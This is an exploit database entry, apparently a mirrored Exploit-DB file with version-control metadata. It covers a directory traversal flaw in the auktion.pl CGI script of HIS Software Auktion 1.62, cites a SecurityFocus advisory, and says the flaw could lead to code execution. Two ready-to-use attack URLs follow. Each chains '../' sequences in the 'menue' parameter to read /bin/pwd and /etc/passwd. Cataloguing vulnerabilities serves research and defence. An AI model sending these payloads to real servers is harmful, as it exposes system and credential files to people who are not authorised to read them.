exploit-db-mirror/exploits/windows/remote/20628.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

7 lines
No EOL
550 B
Text

source: https://www.securityfocus.com/bid/2367/info
A remote user could gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This vulnerability could also lead to the execution of arbitrary code.
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd